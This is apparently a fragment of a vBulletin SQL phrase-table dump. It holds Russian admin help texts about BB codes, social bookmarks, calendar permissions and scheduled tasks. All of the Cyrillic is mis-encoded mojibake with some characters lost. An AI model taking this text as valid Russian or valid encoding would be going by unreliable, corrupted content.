(22050, -1, 'bbcode_modify_text', 'cphelptext', 'Ãòà ñòðà Ãèöà îòîáðà æà åò âñå âà øè òåêóùèå BB êîäû ñ ïðèìåðà ìè êà æäîãî. \r\n\r\nÊîëîÃêè ïî ïîðÿäêó: \r\nÃà çâà Ãèå : Ãà çâà Ãèå BB êîäà . \r\nBB êîä : êîä, èñïîëüçóåìûé äëÿ BB êîäà . \r\nHTML : ïðèìåð BB êîäà , ïðåâðà ùåÃÃûé â HTML. \r\nÇà ìåÃà : êîÃå÷Ãîå îòîáðà æåÃèå. \r\nÈçîáðà æåÃèå êÃîïêè : åñëè âû âûáðà ëè èçîáðà æåÃèå, êîòîðîå äîëæÃî îòîáðà æà òüñÿ â ïà Ãåëè ðåäà êòîðà ñîîáùåÃèé, òî îÃî òà êæå îòîáðà çèòñÿ çäåñü. \r\nÓïðà âëåÃèå : ðåäà êòèðóéòå èëè óäà ëÿéòå BB êîäû îòñþäà .', 'vbulletin', 'zCarot', 1206965967, '3.7.0 Release Candidate 2'),
(22051, -1, 'bbcode_modify_title', 'cphelptext', 'Ãðîñìîòð/ðåäà êòèðîâà Ãèå BB êîäîâ', 'vbulletin', '', 0, ''),
(22052, -1, 'bbcode_modify_text_text', 'cphelptext', 'Âû ìîæåòå òåñòèðîâà òü BB êîäû, ââåäÿ òåêñò â ïîëå \"Ââåäèòå òåêñò ñ BB êîäà ìè\" è Ãà æà â \"Ãðîâåðèòü ýòîò òåêñò\". BB êîä áóäåò ðà çîáðà à òà ê, êà ê åñëè áû âû Ãà ïèñà ëè åãî â ñîîáùåÃèè, è âû ñìîæåòå óâèäåòü, êà ê áóäåò âûãëÿäåòü ðåçóëüòà ò. Ãòî ïîçâîëèò âà ì óçÃà òü, ðà áîòà åò ëè BB êîä ïðà âèëüÃî.', 'vbulletin', 'zCarot', 1206965983, '3.7.0 Release Candidate 2'),
(22053, -1, 'bbcode_modify_text_title', 'cphelptext', 'Ãðîâåðêà âà øèõ BB êîäîâ', 'vbulletin', '', 0, ''),
(22054, -1, 'bbcode_remove_text', 'cphelptext', 'Ãòî ïîäòâåðæäåÃèå òîãî, ÷òî âû æåëà åòå óäà ëèòü ýòîò BB êîä. Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ.', 'vbulletin', '', 0, ''),
(22055, -1, 'bbcode_remove_title', 'cphelptext', 'Óäà ëèòü BB êîä', 'vbulletin', '', 0, ''),
(22056, -1, 'bookmarksite_add_edit_active_text', 'cphelptext', 'Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ, ÷òîáû âðåìåÃÃî îòêëþ÷èòü îòîáðà æåÃèå ññûëîê Ãà äà ÃÃûé ñà éò ñîöèà ëüÃûõ çà êëà äîê, ïðè ýòîì, ÃÃ¥ óäà ëÿÿ åãî èç áà çû äà ÃÃûõ.  òåìà õ îòîáðà æà þòñÿ ññûëêè òîëüêî Ãà à êòèâÃûå ñà éòû ñîöèà ëüÃûõ çà êëà äîê.', 'vbulletin', 'zCarot', 1207820808, '3.7.0 Release Candidate 3'),
(22057, -1, 'bookmarksite_add_edit_active_title', 'cphelptext', 'ÀêòèâÃî', 'vbulletin', 'zCarot', 1207820808, '3.7.0 Release Candidate 3'),
(22058, -1, 'bookmarksite_add_edit_displayorder_text', 'cphelptext', '×èñëî, óêà çà ÃÃîå çäåñü, áóäåò îïðåäåëÿòü ìåñòîïîëîæåÃèå ññûëêè Ãà ñà éò ñîöèà ëüÃûõ çà êëà äîê, îòÃîñèòåëüÃî äðóãèõ òà êèõ ññûëîê. ×åì áîëüøå óêà çà ÃÃîå çäåñü ÷èñëî, òåì ïîçæå áóäåò îòîáðà æà òüñÿ ññûëêà Ãà äà ÃÃûé ñà éò ñîöèà ëüÃûõ çà êëà äîê.', 'vbulletin', 'zCarot', 1207820742, '3.7.0 Release Candidate 3'),
(22059, -1, 'bookmarksite_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1207820742, '3.7.0 Release Candidate 3'),
(22060, -1, 'bookmarksite_add_edit_iconpath_text', 'cphelptext', 'ÈêîÃêà äîëæÃà áûòü 16õ16 ïèêñåëåé è õðà Ãèòüñÿ â äèðåêòîðèè ïðî÷èõ èçîáðà æåÃèé, ïî óìîë÷à Ãèþ ýòî images/misc. ÈêîÃêà áóäåò îòîáðà æà òüñÿ âÃèçó êà æäîé ñòðà Ãèöû òåìû è èñïîëüçîâà òüñÿ êà ê ññûëêà Ãà ñåðâèñ ñîöèà ëüÃûõ çà êëà äîê.', 'vbulletin', 'zCarot', 1193058756, '3.7.0 Beta 1'),
(22061, -1, 'bookmarksite_add_edit_iconpath_title', 'cphelptext', 'ÈêîÃêà ', 'vbulletin', 'zCarot', 1193058756, '3.7.0 Beta 1'),
(22062, -1, 'bookmarksite_add_edit_title_text', 'cphelptext', 'Óêà æèòå çäåñü Ãà çâà Ãèå ñà éòà ñîöèà ëüÃûõ çà êëà äîê òà ê, ÷òîáû ïîëüçîâà òåëè ñìîãëè ïîÃÿòü êà êîé ñà éò âû èìååòå â âèäó.', 'vbulletin', 'zCarot', 1207820159, '3.7.0 Release Candidate 3'),
(22063, -1, 'bookmarksite_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', 'zCarot', 1207820159, '3.7.0 Release Candidate 3'),
(22064, -1, 'bookmarksite_add_edit_url_text', 'cphelptext', 'Ññûëêà , ïî êîòîðîé áóäåò ñäåëà à ïåðåõîä, ïðè Ãà æà òèè Ãà èêîÃêó âÃèçó êà æäîé òåìû. Âû ìîæåòå èñïîëüçîâà òü çà ìåÃû, ÷òîáû óêà çà òü áîëåå ïîëåçÃóþ ññûëêó. \r\n\r\n{TITLE} - Çà ãîëîâîê òåêóùåé ñòðà Ãèöû. \r\n{URL} - Ññûëêà Ãà òåêóùóþ ñòðà Ãèöó. \r\n ', 'vbulletin', 'zCarot', 1193059505, '3.7.0 Beta 1'),
(22065, -1, 'bookmarksite_add_edit_url_title', 'cphelptext', 'Ññûëêà ', 'vbulletin', 'zCarot', 1193059505, '3.7.0 Beta 1'),
(22066, -1, 'bookmarksite_modify_text', 'cphelptext', 'Ñîöèà ëüÃûå çà êëà äêè - ñïîñîá õðà ÃÃ¥Ãèÿ è îðãà Ãèçà öèè çà êëà äîê Ãà âåá ñòðà Ãèöû.  ñèñòåìå ñîöèà ëüÃûõ çà êëà äîê ïîëüçîâà òåëü ñîõðà Ãÿåò ññûëêó Ãà âåá ñòðà Ãèöó, êîòîðóþ îà õî÷åò çà ïîìÃèòü èëè ïîäåëèòüñÿ ñ äðóãèìè. \r\n Ñóùåñòâóåò ìÃîæåñòâî ñåðâèñîâ, ïðåäîñòà âëÿþùèõ âîçìîæÃîñòè ñîöèà ëüÃûõ çà êëà äîê. vBulletin ïîçâîëÿåò ïðåäîñòà âèòü ïðÿìóþ ññûëêó äëÿ äîáà âëåÃèÿ ñòðà Ãèöû âî ìÃîæåñòâî òà êèõ ñåðâèñîâ, ñðà çó æå ïîäãîòà âëèâà ÿ Ãåêîòîðûå äà ÃÃûå äëÿ Ãèõ. \r\n \r\nÑñûëêè Ãà ñåðâèñû ñîöèà ëüÃûõ çà êëà äîê áóäóò îòîáðà æà òüñÿ ïðè ïðîñìîòðå òåìû Ãèæå ñîîáùåÃèé. Ãòè ññûëêè áóäóò îòîáðà æà òüñÿ òîëüêî â òåõ òåìà õ, ïðîñìîòð êîòîðûõ ðà çðåø¸à ãîñòÿì ôîðóìà .', 'vbulletin', 'zCarot', 1205756157, '3.7.0 Release Candidate 1'),
(22067, -1, 'bookmarksite_modify_title', 'cphelptext', 'Óïðà âëåÃèå ñîöèà ëüÃûìè çà êëà äêà ìè', 'vbulletin', 'zCarot', 1193064753, '3.7.0 Beta 1'),
(22068, -1, 'calendarpermission_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÊà ëåÃäà ðè \r\nÃðà âà êà ëåÃäà ðÿ \r\n\r\nÃðà âà êà ëåÃäà ðÿ: \r\nïî óìîë÷à Ãèþ ïîëüçîâà òåëè áóäóò èìåòü ïðà âà èõ ãðóïïû ïîëüçîâà òåëåé (ñì. Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé ) äëÿ êà æäîãî êà ëåÃäà ðÿ. ÎäÃà êî, âåðîÿòÃî âû ÃÃ¥ çà õîòèòå, ÷òîáû Ãåêîòîðûå ãðóïïû ïîëüçîâà òåëåé èìåëè äîñòóï êî âñåì êà ëåÃäà ðÿì.  ýòîì ñëó÷à å ôîðóì ïîçâîëÿåò âà ì ñîçäà òü äðóãèå ïðà âà äëÿ îïðåäåëåÃÃîãî êà ëåÃäà ðÿ è äëÿ îïðåäåëåÃÃîé ãðóïïû ïîëüçîâà òåëåé. Ãòî ïîëåçÃî äëÿ îãðà Ãè÷åÃèÿ äîñòóïà ê îïðåäåëåÃÃûì êà ëåÃäà ðÿì îïðåäåëåÃÃûõ ãðóïï ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22069, -1, 'calendarpermission_title', 'cphelptext', 'ÃŽ ïðà âà õ êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(22070, -1, 'calendarpermission_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå óñòà Ãîâèòü ïðà âà êà ëåÃäà ðÿ äëÿ îïðåäåëåÃÃîãî êà ëåÃäà ðÿ è ãðóïïû ïîëüçîâà òåëåé. Îïöèè îïèñûâà þòñÿ Ãèæå.', 'vbulletin', '', 0, ''),
(22071, -1, 'calendarpermission_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ïðà â êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(22072, -1, 'calendarpermission_edit_mode_text', 'cphelptext', 'Åñëè âû âûáåðèòå \"Èñïîëüçîâà òü îáû÷Ãûå Ãà ñòðîéêè ãðóïïû ïîëüçîâà òåëåé\", òî ýòà ãðóïïà ïîëó÷èò îáû÷Ãûå ïðà âà äëÿ ýòîãî êà ëåÃäà ðÿ. Åñëè âû âûáåðèòå äðóãèå ïðà âà è ÃÃ¥ óñòà Ãîâèòå Ãà \"Èñïîëüçîâà òü äðóãèå Ãà ñòðîéêè ãðóïïû ïîëüçîâà òåëåé\", òî âû áóäåòå ïðåäóïðåæäåÃû îá ýòîì. Åñëè âû ïðîèãÃîðèðóéòå ïðåäóïðåæäåÃèå è óñòà Ãîâèòå äðóãèå ïðà âà áåç óñòà Ãîâêè Ãà \"Èñïîëüçîâà òü äðóãèå Ãà ñòðîéêè ãðóïïû ïîëüçîâà òåëåé\", òî Ãà ñòðîéêè ÃÃ¥ áóäóò ñîõðà ÃÃ¥Ãû.', 'vbulletin', '', 0, ''),
(22073, -1, 'calendarpermission_edit_mode_title', 'cphelptext', 'Èñïîëüçîâà òü îáû÷Ãûå/äðóãèå Ãà ñòðîéêè ãðóïïû ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22074, -1, 'calendarpermission_edit_canviewcalendar_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ýòà ãðóïïà ïîëüçîâà òåëåé ÃÃ¥ ñìîæåò óâèäåòü ýòîò êà ëåÃäà ðü è ïðîñìîòðåòü åãî ñîäåðæèìîå.', 'vbulletin', '', 0, ''),
(22075, -1, 'calendarpermission_edit_canviewcalendar_title', 'cphelptext', 'Ìîæåò ïðîñìà òðèâà òü êà ëåÃäà ðü', 'vbulletin', '', 0, ''),
(22076, -1, 'calendarpermission_edit_canpostevent_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ñìîãóò äîáà âëÿòü Ãîâûå ñîáûòèÿ â êà ëåÃäà ðü. \r\n\r\nÃîìÃèòå, ÷òî ïóòü ðåà ëèçà öèè ñîáûòèé áûë èçìåÃåà ñ âåðñèè 2.2.x. Èäåÿ \"îáùèõ\" è \"ëè÷Ãûõ\" ñîáûòèé ÃÃ¥ èçìåÃèëà ñü äëÿ åäèÃè÷Ãîãî òèïà ñîáûòèÿ; îäÃà êî, òåïåðü åñòü òîëüêî îäÃà îïöèÿ îòÃîñèòåëüÃî ñîçäà Ãèÿ ñîáûòèé. Ãà ðà ìåòð \"Ìîæåò ïðîñìà òðèâà òü ñîáûòèÿ äðóãèõ\" îïðåäåëÿåò, ÿâëÿåòñÿ ëè ñîáûòèå îáùèì. (Ñì. Ìîæåò ïðîñìà òðèâà òü ñîáûòèÿ äðóãèõ )', 'vbulletin', 'zCarot', 1205940740, '3.7.0 Release Candidate 1'),
(22077, -1, 'calendarpermission_edit_canpostevent_title', 'cphelptext', 'Ìîæåò äîáà âëÿòü ñîáûòèÿ â êà ëåÃäà ðü', 'vbulletin', '', 0, ''),
(22078, -1, 'calendarpermission_edit_caneditevent_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ñìîãóò ðåäà êòèðîâà òü ñîáûòèÿ, êîòîðûå îÃè îñòà âèëè â êà ëåÃäà ðå. Ãòî ÃÃ¥ äåéñòâóåò, åñëè ïîëüçîâà òåëü ÿâëÿåòñÿ ìîäåðà òîðîì ýòîãî êà ëåÃäà ðÿ è åãî ïðà âà ìîäåðà òîðà ïîçâîëÿþò åìó ðåäà êòèðîâà òü ñîáûòèÿ.', 'vbulletin', '', 0, ''),
(22079, -1, 'calendarpermission_edit_caneditevent_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñâîè ñîáûòèÿ', 'vbulletin', '', 0, ''),
(22080, -1, 'calendarpermission_edit_candeleteevent_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ñìîãóò óäà ëÿòü ñîáûòèÿ, êîòîðûå îÃè îñòà âèëè â êà ëåÃäà ðå. Ãòî ÃÃ¥ äåéñòâóåò, åñëè ïîëüçîâà òåëü ÿâëÿåòñÿ ìîäåðà òîðîì ýòîãî êà ëåÃäà ðÿ è åãî ïðà âà ìîäåðà òîðà ïîçâîëÿþò åìó óäà ëÿòü ñîáûòèÿ.', 'vbulletin', '', 0, ''),
(22081, -1, 'calendarpermission_edit_candeleteevent_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñâîè ñîáûòèÿ', 'vbulletin', '', 0, ''),
(22082, -1, 'calendarpermission_edit_canviewothersevent_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò ïðîñìà òðèâà òü ñîáûòèÿ, êîòîðûå îñòà âèëè çäåñü äðóãèå ïîëüçîâà òåëè.  ïðîòèâÃîì ñëó÷à å, ñîáûòèÿ ÃÃ¥ áóäóò âèäèìû äëÿ ýòîé ãðóïïû. \r\nÃîìÃèòå, ÷òî ïóòü ðåà ëèçà öèè ñîáûòèé áûë èçìåÃåà ñ âåðñèè 2.2.x. Èäåÿ \"îáùèõ\" è \"ëè÷Ãûõ\" ñîáûòèé ÃÃ¥ èçìåÃèëà ñü äëÿ åäèÃè÷Ãîãî òèïà ñîáûòèÿ; îäÃà êî, òåïåðü åñòü òîëüêî îäÃà îïöèÿ îòÃîñèòåëüÃî ñîçäà Ãèÿ ñîáûòèé. Ãòîò ïà ðà ìåòð îïðåäåëÿåò, ÿâëÿåòñÿ ëè ñîáûòèå îáùèì. Åñëè \"Äà \", òî ñîáûòèÿ ýòîãî êà ëåÃäà ðÿ áóäóò îáùèìè.  ïðîòèâÃîì ñëó÷à å - ëè÷Ãûìè. (Ñì. Ìîæåò äîáà âëÿòü ñîáûòèÿ â êà ëåÃäà ðü )', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22083, -1, 'calendarpermission_edit_canviewothersevent_title', 'cphelptext', 'Ìîæåò ïðîñìà òðèâà òü ñîáûòèÿ äðóãèõ', 'vbulletin', '', 0, ''),
(22084, -1, 'calendarpermission_edit_isnotmoderated_text', 'cphelptext', 'Ãðîâåðêà ñîáûòèé ìîæåò áûòü âêëþ÷åÃà äëÿ çà ïèñåé êà ëåÃäà ðÿ ñ ïîìîùüþ ðåäà êòèðîâà Ãèÿ åãî ïà ðà ìåòðîâ. Ãòî ðà çðåøåÃèå ïîçâîëèò âà ì óêà çà òü èñêëþ÷åÃèÿ äëÿ Ãåêîòîðûõ ãðóïï ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22085, -1, 'calendarpermission_edit_isnotmoderated_title', 'cphelptext', 'Ñîáûòèÿ ÃÃ¥ ïðîâåðÿþòñÿ', 'vbulletin', '', 0, ''),
(22086, -1, 'calendarpermission_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå óñòà Ãîâèòü äðóãèå ïðà âà äëÿ ëþáîé ãðóïïû ïîëüçîâà òåëåé ê îïðåäåëåÃÃîìó êà ëåÃäà ðþ. Äëÿ êà æäîãî êà ëåÃäà ðÿ åñòü ñïèñîê âñåõ ãðóïï ïîëüçîâà òåëåé. Åñëè Ãà çâà Ãèå ãðóïïû - êðà ñÃîå, òî åé óæå óñòà ÃîâëåÃû äðóãèå ïðà âà . Åñëè Ãà çâà Ãèå - áåëîå, òî èñïîëüçóþòñÿ îáû÷Ãûå ïðà âà . Äëÿ èçìåÃÃ¥Ãèÿ ïðà â Ãà æìèòå \"Ãåäà êòèðîâà òü\" ðÿäîì ñ Ãà çâà Ãèåì ãðóïïû, ïðà âà êîòîðîé æåëà åòå èçìåÃèòü; ãðóïïà äîëæÃà Ãà õîäèòñÿ ïîä Ãà çâà Ãèåì êà ëåÃäà ðÿ, â êîòîðîì æåëà åòå èçìåÃèòü ïðà âà ýòîé ãðóïïû. ', 'vbulletin', '', 0, ''),
(22087, -1, 'calendarpermission_modify_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå ïðà â êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(22088, -1, 'cronadmin_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÇà ïëà Ãèðîâà ÃÃûå çà äà Ãèÿ \r\nÇà ïèñè âûïîëÃÃ¥Ãèé çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèé \r\nÇà ïëà Ãèðîâà ÃÃûå çà äà Ãèÿ: \r\nÑèñòåìà çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèé ôîðóìà èñïîëüçóåòñÿ äëÿ çà ïóñêà çà äà ÷, âûïîëÃÃ¥Ãèå êîòîðûõ Ãåîáõîäèìî â îïðåäåëåÃÃûå èÃòåðâà ëû âðåìåÃè. Çà äà Ãèÿ âûïîëÃÿþòñÿ äâèæêîì ôîðóìà â óêà çà ÃÃîå âðåìÿ. \r\n Èñïîëüçîâà Ãèå ñèñòåìû çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèé óïðîùà åò âûïîëÃÃ¥Ãèå ñèñòåìà òè÷åñêèõ çà äà ÷, òà êèõ êà ê îáÃîâëåÃèå ñ÷¸ò÷èêîâ è îòïðà âêà ýëåêòðîÃÃûõ ïèñåì. Òà êèå çà äà ÷è ìîãóò áûòü ïîñòà âëåÃû â î÷åðåäü è âûïîëÃÃ¥Ãû âñå ñðà çó, ÷òî ñÃèçèò Ãà ãðóçêó Ãà ñåðâåð. Ãòî ìîæåò ïðèÃåñòè èìåòü áîëüøîå çÃà ÷åÃèå Ãà ôîðóìà õ ñ áîëüøèì òðà ôèêîì. Âû ìîæåòå ïëà Ãèðîâà òü ÷à ñòî âûïîëÃÿåìûå çà äà Ãèÿ â îñÃîâÃûõ Ãà ñòðîéêà õ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22089, -1, 'cronadmin_title', 'cphelptext', 'ÃŽ çà ïëà Ãèðîâà ÃÃûõ çà äà Ãèÿõ', 'vbulletin', '', 0, ''),
(22090, -1, 'cronadmin_add_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âëÿòü Ãîâûå çà äà Ãèÿ.', 'vbulletin', '', 0, ''),
(22091, -1, 'cronadmin_add_title', 'cphelptext', 'Äîáà âèòü çà äà Ãèå', 'vbulletin', '', 0, ''),
(22092, -1, 'cronadmin_add_edit_active_text', 'cphelptext', 'Åñëè \"Ãåò\", òî çà äà Ãèå áîëüøå ÃÃ¥ áóäåò âûïîëÃÿòüñÿ à âòîìà òè÷åñêè, Ãî âñåãäà ìîæÃî áóäåò çà ïóñòèòü åãî ÷åðåç êÃîïêó \"ÂûïîëÃèòü ñåé÷à ñ\".', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22093, -1, 'cronadmin_add_edit_active_title', 'cphelptext', 'Âêëþ÷åÃ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22094, -1, 'cronadmin_add_edit_description_text', 'cphelptext', 'Ãòî îïèñà Ãèå äà ÃÃîãî çà ïëà Ãèðîâà ÃÃîãî çà äà Ãèÿ. ÃŽÃî èñïîëüçóåòñÿ òîëüêî ÷òîáû âû çÃà ëè, ÷òî èìåÃÃî äåëà åò ýòî çà äà Ãèå. Ìîæåòå Ãà ïèñà òü çäåñü âñ¸ ÷òî óãîäÃî.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22095, -1, 'cronadmin_add_edit_description_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22096, -1, 'cronadmin_add_edit_varname_text', 'cphelptext', 'Ãòî êîðîòêîå èìÿ çà äà Ãèÿ, êîòîðîå èñïîëüçóåòñÿ äëÿ âÃóòðåÃÃèõ öåëåé. ÃŽÃî ìîæåò ñîäåðæà òüñÿ òîëüêî áóêâû, öèôðû è çÃà êè ïîä÷¸ðêèâà Ãèÿ, ïðè ýòîì ïåðâûì ñèìâîëîì îáÿçà òåëüÃî äîëæÃà áûòü áóêâà .', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22097, -1, 'cronadmin_add_edit_varname_title', 'cphelptext', 'Èìÿ ïåðåìåÃÃîé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22098, -1, 'cronadmin_add_edit_logphrase_text', 'cphelptext', 'Ôðà çà äëÿ çà ïèñåé îïðåäåëÿåò òåêñò, êîòîðûé áóäåò îòîáðà æà òüñÿ â çà ïèñÿõ à äìèÃèñòðèðîâà Ãèÿ. Âà ì ÃóæÃî ïåðåäà âà òü òðåòüèì ïà ðà ìåòðîì ôóÃêöèè log_cron_action() åäèÃèöó, ÷òîáû èñïîëüçîâà òü ýòó ôðà çó ïðè ïðîñìîòðå çà ïèñåé âûïîëÃÃ¥Ãèÿ çà äà ÷.  ïðîòèâÃîì ñëó÷à å â çà ïèñÿõ áóäåò îòîáðà æà òüñÿ òåêñò èç ïîëÿ \"Îïèñà Ãèå\". Âû òà êæå ìîæåòå ñîõðà Ãèòü òåêñò èç ïîëÿ \"Îïèñà Ãèå\" â óïîðÿäî÷åÃÃîé ôîðìå, åñëè ó âà ñ áîëåå îäÃîé çà ìåÃÿåìîé ïåðåìåÃÃîé âî ôðà çå.', 'vbulletin', 'zCarot', 1213610500, '3.8.0 Alpha 1'),
(22099, -1, 'cronadmin_add_edit_logphrase_title', 'cphelptext', 'Ôðà çà äëÿ çà ïèñåé', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22100, -1, 'cronadmin_add_edit_title_text', 'cphelptext', 'Ãòî çà ãîëîâîê çà ïëà Ãèðîâà ÃÃîãî çà äà Ãèÿ. Îà èñïîëüçóåòñÿ òîëüêî äëÿ èÃôîðìà öèè î çà äà Ãèè â ïà Ãåëè óïðà âëåÃèÿ è ìîæåò áûòü ëþáûì.', 'vbulletin', '', 0, ''),
(22101, -1, 'cronadmin_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(22102, -1, 'cronadmin_add_edit_weekday_text', 'cphelptext', 'Óêà æèòå çäåñü äåÃü Ãåäåëè, ïî êîòîðîìó áóäåò çà ïóñêà òüñÿ ýòî çà ïëà Ãèðîâà ÃÃîå çà äà Ãèå. Ãîìåòüòå åãî çâåçäî÷êîé (*), ÷òîáû èëè îòìåÃèòü åãî, èëè äëÿ çà ïóñêà åãî êà æäûé äåÃü (åñëè Ãèæå îïöèÿ \"ÄåÃü ìåñÿöà \" òîæå ïîìå÷åÃà çâåçäî÷êîé (*)).  ïðîòèâÃîì ñëó÷à å âûáåðèòå êîÃêðåòÃûé äåÃü. Èìåéòå ââèäó, ÷òî ýòî îòìåÃèò îïöèþ \"ÄåÃü ìåñÿöà \", äà æå åñëè îÃà ÃÃ¥ îòìå÷åÃà çâåçäî÷êîé (*).', 'vbulletin', '', 0, ''),
(22103, -1, 'cronadmin_add_edit_weekday_title', 'cphelptext', 'ÄåÃü Ãåäåëè', 'vbulletin', '', 0, ''),
(22104, -1, 'cronadmin_add_edit_day_text', 'cphelptext', 'Óêà æèòå çäåñü äåÃü ìåñÿöà , ïî êîòîðîìó áóäåò çà ïóñêà òüñÿ ýòî çà ïëà Ãèðîâà ÃÃîå çà äà Ãèå. Ãòî à ÃÃóëèðóåò ïà ðà ìåòð \"ÄåÃü Ãåäåëè\". Âûáåðèòå çâåçäî÷êó (*), ÷òîáû ÃÃ¥ èñïîëüçîâà òü äà ÃÃûé ïà ðà ìåòð.', 'vbulletin', '', 0, ''),
(22105, -1, 'cronadmin_add_edit_day_title', 'cphelptext', 'ÄåÃü ìåñÿöà ', 'vbulletin', '', 0, ''),
(22106, -1, 'cronadmin_add_edit_hour_text', 'cphelptext', 'Óêà æèòå çäåñü ÷à ñ, ïî êîòîðîìó áóäåò çà ïóñêà òüñÿ ýòî çà ïëà Ãèðîâà ÃÃîå çà äà Ãèå. Ãîìåòüòå åãî çâåçäî÷êîé (*), ÷òîáû îÃî çà ïóñêà ëîñü êà æäûé ÷à ñ.', 'vbulletin', '', 0, ''),
(22107, -1, 'cronadmin_add_edit_hour_title', 'cphelptext', '×à ñ', 'vbulletin', '', 0, ''),
(22108, -1, 'cronadmin_add_edit_minute_text', 'cphelptext', 'Óêà æèòå çäåñü ìèÃóòó ÷à ñà , ïî êîòîðîé áóäåò çà ïóñêà òüñÿ ýòî çà ïëà Ãèðîâà ÃÃîå çà äà Ãèå. Ãîìåòüòå åãî çâåçäî÷êîé (*), ÷òîáû îÃî çà ïóñêà ëîñü êà æäóþ ìèÃóòó (ÃÃ¥ ðåêîìåÃäóåòñÿ!).', 'vbulletin', '', 0, ''),
(22109, -1, 'cronadmin_add_edit_minute_title', 'cphelptext', 'ÌèÃóòà ', 'vbulletin', '', 0, ''),
(22110, -1, 'cronadmin_add_edit_loglevel_text', 'cphelptext', 'Åñëè óñòà ÃîâëåÃî \"Äà \", òî êà æäûé ðà ç ïðè çà ïóñêå çà ïëà Ãèðîâà ÃÃîãî çà äà Ãèÿ áóäåò ñîçäà Ãà çà ïèñü, â êîòîðîé áóäåò îòîáðà æåÃî, êîãäà çà äà Ãèå áûëî çà ïóùåÃî, è â êîòîðîé, â Ãåêîòîðûõ ñëó÷à ÿõ, áóäåò ñîäåðæà òüñÿ äîïîëÃèòåëüÃà ÿ èÃôîðìà öèÿ (Ãà ïðèìåð, äëÿ çà äà Ãèÿ îòïðà âêè ïèñåì â äÃè ðîæäåÃèÿ, áóäóò çà ïèñûâà òüñÿ èìåÃà ïîëüçîâà òåëåé, êîòîðûì ïîñûëà þòñÿ ïîçäðà âëåÃèÿ).', 'vbulletin', '', 0, ''),
(22111, -1, 'cronadmin_add_edit_loglevel_title', 'cphelptext', 'Çà ïèñûâà òü äåéñòâèÿ', 'vbulletin', '', 0, ''),
(22112, -1, 'cronadmin_add_edit_filename_text', 'cphelptext', 'Ãòî ñà ìà ÿ ãëà âÃà ÿ Ãà ñòðîéêà . Ââåäèòå ïóòü è èìÿ ôà éëà , êîòîðûé äîëæåà áûòü çà ïóùåÃ. Ãóòü äîëæåà áûòü îòÃîñèòåëüÃî ãëà âÃîé äèðåêòîðèè ôîðóìà . Îáû÷Ãî çà ïëà Ãèðîâà ÃÃûå çà äà Ãèÿ Ãà õîäÿòñÿ â äèðåêòîðèè \r\n./includes/cron/ \r\nÃîìÃèòå, ÷òî â Ãà ÷à ëå ñòîèò òî÷êà - ýòî îçÃà ÷à åò, ÷òî äà ëüøå èäåò à áñîëþòÃûé ïóòü îò òåêóùèé äèðåêòîðèè, à ÃÃ¥ îò êîðÃåâîé äèðåêòîðèè ñåðâåðà (ýòî áóäåò îçÃà ÷à òü /includes/cron would). Âû ìîæåòå òà êæå ïèñà òü âûøåóêà çà ÃÃîå êà ê \r\nincludes/cron \r\nÔà éë Ãà çà ïóñê ÃÃ¥ äîëæåà âûâîäèòü ÷òî-ëèáî êóäà -ëèáî, â òîì ÷èñëå Ãà ýêðà Ã.', 'vbulletin', '', 0, ''),
(22113, -1, 'cronadmin_add_edit_filename_title', 'cphelptext', 'Èìÿ ôà éëà ', 'vbulletin', '', 0, ''),
(22114, -1, 'cronadmin_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå îòðåäà êòèðîâà òü ñóùåñòâóþùåå çà äà Ãèå.', 'vbulletin', '', 0, ''),
(22115, -1, 'cronadmin_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå çà äà Ãèÿ', 'vbulletin', '', 0, ''),
